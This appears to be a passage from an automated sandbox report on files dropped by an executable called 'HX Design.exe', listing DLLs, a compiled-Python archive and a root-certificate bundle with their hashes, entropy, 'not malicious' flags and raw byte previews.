                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xYWgWthWkLWEXCVWQ4iWNbTseUfX01k9z3AwMwFg:xYWgWthWkAu/6fR9z3G
                                                                                                                                                                                                                                                    MD5:8222B0F8BCF884433A55996253963A96
                                                                                                                                                                                                                                                    SHA1:35914B003BBE6527E2479D7F897024915821500F
                                                                                                                                                                                                                                                    SHA-256:7F18DC2971D15434BFE03C4842DCED10B466E849D782A1C8E398D96C2E2B12E2
                                                                                                                                                                                                                                                    SHA-512:5E67B25AF8A1F23450CF8807135FEA1EC39DFE8FF7CD3858E492AE9E016A23967ED6009DA8868CD9DC87D583C3B7E6FB66D00BD48A7BBA6B0EEA638716514CC6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....0...............................................@............`A........................................p...<............0...............0...%..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22080
                                                                                                                                                                                                                                                    Entropy (8bit):4.908338281071753
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xM0sWthWhWEXCVWQ4iWa81BHX01k9z3ApO/DSiSp:xgWthW+bIBHR9zUO6p
                                                                                                                                                                                                                                                    MD5:5BC2660D94760AF50F96B1999DE6CFAB
                                                                                                                                                                                                                                                    SHA1:75DEC9B15BF9181F0E8015992B678BAC718D8C0B
                                                                                                                                                                                                                                                    SHA-256:03BEBF73DF97BEED5DA608CAE73324DF2AAEC092277D53CE8C119031CF8E21FD
                                                                                                                                                                                                                                                    SHA-512:7E9C67B5E46B35BA3F733110CF7FE35AC9DC1B41A4F7633180CD69631D1B82BCAC99F8B94B6F36A373F72BC4FD7EEAAC21A8FB51830914A32E19D738208CA636
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...n.;..........." ...&.....0...............................................@.......(....`A.........................................................0...............0..@&..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):26168
                                                                                                                                                                                                                                                    Entropy (8bit):4.876426474332742
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:x2tuJ9cyRWthWxWJWadJCsVWQ4mWEsLrp0KBQfX01k9z3A3WXngTwS:xayRWthWwCsMRxB+R9zcWXpS
                                                                                                                                                                                                                                                    MD5:4BB011D3E58E958E94CA23AE05A8E958
                                                                                                                                                                                                                                                    SHA1:741AF22136C1D6DCE03C75C68E977C05D76AC027
                                                                                                                                                                                                                                                    SHA-256:06B0FD7E6D7CBE35177AF8FC17863F247BD5CAEE64543E3A9A125253D51AF777
                                                                                                                                                                                                                                                    SHA-512:07668515AA4099C390CE30EF3415E412113483DA792D7CD02BB3DDCE561719E808D6BE81B90D599F4A7FA50BA27382C8D84ECB45292200BBA7094A5204FF7715
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....V............" ...&.....@...............................................P.......b....`A.........................................................@...............@..8&..............p............................................................................rdata..n........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):4.729270297531757
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xXUWthW2WEXCVWQ4OWTvzxwVIX01k9z3AyAIggcJ:xXUWthWpuxR9ztkXJ
                                                                                                                                                                                                                                                    MD5:16A97489DAB15DB9B9713C53726F3411
                                                                                                                                                                                                                                                    SHA1:C15AD01807955374283805104233BD56760B25C9
                                                                                                                                                                                                                                                    SHA-256:9C06541D13C7088F313AAB0BE5AF20B72E583F34E442DF3D2FC29953640D4812
                                                                                                                                                                                                                                                    SHA-512:54FFA278E4D0975830C1A8EFF9B7FC41D487CD9E8390D0E14F58CFF62EFADFC5816BCDA3CA11E2B1CBAEECB20546839593F7C6EA9500EEF433F299861D205822
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...>"k..........." ...&.....0...............................................@...........`A............................................"............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):5.194271824748394
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xfuuEpnWlC0i5CZWthWVgIWEXCVWQ4OWixwVIX01k9z3AyAIqoy:xAnWm5CZWthW4VR9ztuoy
                                                                                                                                                                                                                                                    MD5:3491700E847FB9E9C4413FC82A0AD285
                                                                                                                                                                                                                                                    SHA1:03694CD43A06BB2FFF6A1D85F73BD7B87198E07E
                                                                                                                                                                                                                                                    SHA-256:ED969FAE3CF64F46B5F4D2447980BEFD6F0A7FD05802529DBC793F3C014BC46C
                                                                                                                                                                                                                                                    SHA-512:07E81EABCEF621EC6A84E1932E299E0B865C06E6F9907017BBED0121771712B007A18771099131F24DA134F3CBFF0A7AF30CA4E1C262B117E8BACF055CD54002
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....y..........." ...&.....0...............................................@............`A.........................................................0...............0..(&..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):4.854074053944529
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xMIfh8Y17aFBRMWthWmWEXCVWQ4OW07xwVIX01k9z3AyAIZid:xjLRWthW5DR9ztdid
                                                                                                                                                                                                                                                    MD5:E3EDE68927C68AA73AC95722D24334CE
                                                                                                                                                                                                                                                    SHA1:DBE71E1A56F9B7569B4A568BB67E37C38011B879
                                                                                                                                                                                                                                                    SHA-256:5DD42E524920F4CB467031EB9E0E440BBE73DE0FB39F71E65736A2AB2F6FCFE8
                                                                                                                                                                                                                                                    SHA-512:D935058D8409B518D82336DC0B1521BF411EF77EF49485EDE15BAF5D1AC527F46AD813EBDB889C0F9999D553A879150D5BA41CE3A0B11D5CA08907E378FC9B8D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....j..........." ...&.....0...............................................@......).....`A.........................................................0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):4.816531613699453
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:x9vWthWsWEXCVWQ4KWxAgfcMbnoQNpX01k9z3AK0OFol:xpWthWXK/7R9z/0pl
                                                                                                                                                                                                                                                    MD5:3CCA955CDE8362605FC268E4B12ACCAA
                                                                                                                                                                                                                                                    SHA1:6F3C214EF223F35495C0CB0EE359B9D975C14E72
                                                                                                                                                                                                                                                    SHA-256:34C6E58ABCCE5BCCACE50DF3BD6C3E2D3F4E8413B14AAE8E707DDFDDCCDEBA6D
                                                                                                                                                                                                                                                    SHA-512:5B7FE7DEB6066C53BD41479172EAC2736301F5CF32921F13D2CE6AD2811925E7BC1C436627698050BE86DDF18852EEAC927BE4EFC2182D857B31F637ADC6C206
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....?%..........." ...&.....0...............................................@......u-....`A............................................e............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):30248
                                                                                                                                                                                                                                                    Entropy (8bit):5.12899703302781
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:xB7yaFM4Oe59Ckb1hgmLtWthW+62IR9zT8Fb:xlFMq59Bb1jc9U9zIFb
                                                                                                                                                                                                                                                    MD5:E6184D65799033DBEE51667790130016
                                                                                                                                                                                                                                                    SHA1:B00461D14FFA2BEAB0887BCB716F331090CCE8C9
                                                                                                                                                                                                                                                    SHA-256:EECAC10F830AD0DCBDF0F0DC1422EF5CFED490A877429A4674AECC560869A5E5
                                                                                                                                                                                                                                                    SHA-512:987C14F8C22AE0D6C1005CC7B0D9A240283C2120E8DED030A407F25FB7786F7283980850CA243859F0148DBEB7BFAEC01C8208865B81046999252D07E5F42D53
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...k............." ...&.....P...............................................`............`A.............................................%...........P...............P..(&..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22056
                                                                                                                                                                                                                                                    Entropy (8bit):4.870120119665403
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xsMeXrqjd7xWthWiWEXCVWQ4KWvynwKUWX01k9z3A6weTr6s:xsM4rwWthW1GH2R9zDw6x
                                                                                                                                                                                                                                                    MD5:FA9B5CEC8EED4FEF73EC60D7F4C1EB1E
                                                                                                                                                                                                                                                    SHA1:03F19B2886688DE1FB2016D614FE514F8B508250
                                                                                                                                                                                                                                                    SHA-256:09F19B41A8D71CD5174EFDAE2A7649022780434D7C4416D6121153359AA85918
                                                                                                                                                                                                                                                    SHA-512:744288D8903FDCEED87CC5B7E0E286FAB59584B57ACDD943B04C5F6A39391A1662961A686344C1FDCE36AEA039ADF8B1FCFC883E06011DD592077931716CDFF7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....cZB.........." ...&.....0...............................................@......T.....`A............................................x............0...............0..(&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):26152
                                                                                                                                                                                                                                                    Entropy (8bit):5.013612013371217
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xhmGqX8mPrpJhhf4AN5/KidWthWqWEXCVWQ4OWImxwVIX01k9z3AyAILBm4/:xhysyr7DWthW9wR9zt/Bm4/
                                                                                                                                                                                                                                                    MD5:BE6D51793BC63716FB45CB49958B0F6A
                                                                                                                                                                                                                                                    SHA1:E2563B2C324B58BAD602C46BC4D6148CE5319C10
                                                                                                                                                                                                                                                    SHA-256:EDD8206EF8CAF25E955E9FBA2C9C8EBF73D8EC3FD0F562372F7ED8B8F7004C2F
                                                                                                                                                                                                                                                    SHA-512:31FA876B8DC54D882DB0D8A3C7E6784B893B6C8B4A04688261720D75402CB4229F07C70DF4DABB032B63940D8E3BA95978D439B5F0F9A21C62A8ADBCC92BCABE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...{?.U.........." ...&.....@...............................................P......Xd....`A............................................4............@...............@..(&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):26168
                                                                                                                                                                                                                                                    Entropy (8bit):5.289698919350045
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:x7xWRV2OlkuWYFxEpahnWthWBWJWadJCsVWQ4OW3LUNVAv+cQ0GX01k9z3A1tUgL:xgRV2oFVhnWthWgCss4NbZR9zOtUgBN
                                                                                                                                                                                                                                                    MD5:CE04551E4A578993207EED8F49E045DC
                                                                                                                                                                                                                                                    SHA1:F2EA2B8901458263879E76F67C4154559252AA5B
                                                                                                                                                                                                                                                    SHA-256:F6BA90E21A1E31FF2BE7292C2A03D20570788FD829E075AB4A6D37A9CA2BA194
                                                                                                                                                                                                                                                    SHA-512:872AF73065241877679E96DD6C5E8458417436241262829A378768AA47CB290F45AAB67DDF205BCCD6846A2189A0BD26A31FB01F1D7886FE93067687055F4FE5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...i.X..........." ...&.....@...............................................P............`A............................................a............@...............@..8&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):26040
                                                                                                                                                                                                                                                    Entropy (8bit):5.260094162435671
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:xcCLx0C5yguNvZ5VQgx3SbwA7yMVIkFGlbWthWnvgR9z9Ur:xcCV5yguNvZ5VQgx3SbwA71IkFZf9zw
                                                                                                                                                                                                                                                    MD5:03F1E99C4258416B4C6800081B3701E2
                                                                                                                                                                                                                                                    SHA1:502D6654CC0A331B8C45EB760DB39EDBC3EE93C9
                                                                                                                                                                                                                                                    SHA-256:ABF8A6AD52F6C71458DC2C159EB8CE7A297494177F8E05FD52A1E7BCEB493426
                                                                                                                                                                                                                                                    SHA-512:7A1FC6488C4EEE4A32963B1E78B76AC1C4D4C196C8B2743AE4CC89805FA02F554210D0FE5A87AFA258ABE3C24C710315FACDEA997E7AA2EFFCF8664B8531C459
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....@...............................................P............`A.........................................................@...............@...%..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22080
                                                                                                                                                                                                                                                    Entropy (8bit):5.2430120828537214
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xUvhwDmWthWJWEXCVWQ4WWHTzxOhJNlOCgX01k9z3Akfo4tKFuE:xUWthWmszxIPaR9zvfptCt
                                                                                                                                                                                                                                                    MD5:C4AF0DC7D97105DEAC352F569BEB603D
                                                                                                                                                                                                                                                    SHA1:F52D7EE9AE432DBF5B42D5FB2A816411138D7E03
                                                                                                                                                                                                                                                    SHA-256:B66AE7E1D0DA45A758B2EC9D2727F8F59A2D0A59BF43BE347369381338C6AFB3
                                                                                                                                                                                                                                                    SHA-512:8961B1ACAB372511D45B4CB08F6672BEBC436F19C854F73058BB28E56DDD57DFD18AAB785B39E0B1254CE9E2989E6DB744E1DE503429932FCE2B0F53F000D91F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...s.D..........." ...&.....0...............................................@............`A.........................................................0...............0..@&..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22072
                                                                                                                                                                                                                                                    Entropy (8bit):4.798219482536998
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:xU/fHQduLWthWIWJWadJCsVWQ4OW8Z5NVAv+cQ0GX01k9z3A1tUx0:xU/flWthWVCsXNbZR9zOtUO
                                                                                                                                                                                                                                                    MD5:B5C0E86861A795B607B3DDDF29CEAB01
                                                                                                                                                                                                                                                    SHA1:4ECE72B0A9D8F42DA935F9AFFE3280B48805D9C1
                                                                                                                                                                                                                                                    SHA-256:837167FAA319CAB764615FCFDB375008AED60C399B139DC0B3B0338A106F3B18
                                                                                                                                                                                                                                                    SHA-512:6EC88FBBBDD3377650BC575DA6F1D1A8F94B445BCEB6D96894A511B690CD3AF63BE5DF448BC6BCAC0E3200086F90CD1707C5B281BACFBBDF7A02F984F3DDF32B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d................." ...&.....0...............................................@...... .....`A............................................^............0...............0..8&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1394456
                                                                                                                                                                                                                                                    Entropy (8bit):5.531698507573688
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
                                                                                                                                                                                                                                                    MD5:A9CBD0455B46C7D14194D1F18CA8719E
                                                                                                                                                                                                                                                    SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
                                                                                                                                                                                                                                                    SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
                                                                                                                                                                                                                                                    SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:PK..........!..b.e............_collections_abc.pyc......................................\.....S.r.S.S.K.J.r.J.r. .S.S.K.r.\.".\.\.....5.......r.\.".S.5.......r.S...r.\.".\.5.......r.C./.S.Q.r.S.r.\.".\.".S.5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".0.R%..................5.......5.......5.......r.\.".\.".0.R)..................5.......5.......5.......r.\.".\.".0.R-..................5.......5.......5.......r.\.".\."./.5.......5.......r.\.".\.".\."./.5.......5.......5.......r.\.".\.".\.".S.5.......5.......5.......r.\.".\.".\.".S.S.-...5.......5.......5.......r.\.".\.".\.".5.......5.......5.......r.\.".\.".S.5.......5.......r \.".\.".S.5.......5.......r!\.".\.".\"".5.......5.......5.......r#\.".0.R%..................5.......5.......r$\.".0.R)..................5.......5.......r%\.".0.R-..................5.......5.......r&\.".\.RN..................5.......r(S...r)\)".5.......r*C)\.".S...".5.......5.......r+S...r,\,".5.......r,\.".\,5.......r-\,R]..................5.......
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):299427
                                                                                                                                                                                                                                                    Entropy (8bit):6.047872935262006
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                                                                    MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                                                                    SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                                                                    SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                                                                    SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\HX Design.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9728
                                                                                                                                                                                                                                                    Entropy (8bit):6.713834296304915
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:MnE9WrStIf1F25LInXfzruPpkYj273QJXpHE0w:qGo1F2AXbaPpZa7gJXS0
                                                                                                                                                                                                                                                    MD5:D0B38F1445119C61DE26D4A151558EA6
                                                                                                                                                                                                                                                    SHA1:2DC4AB4C00FF2FF48E6B68701CEB1DA8620D7401
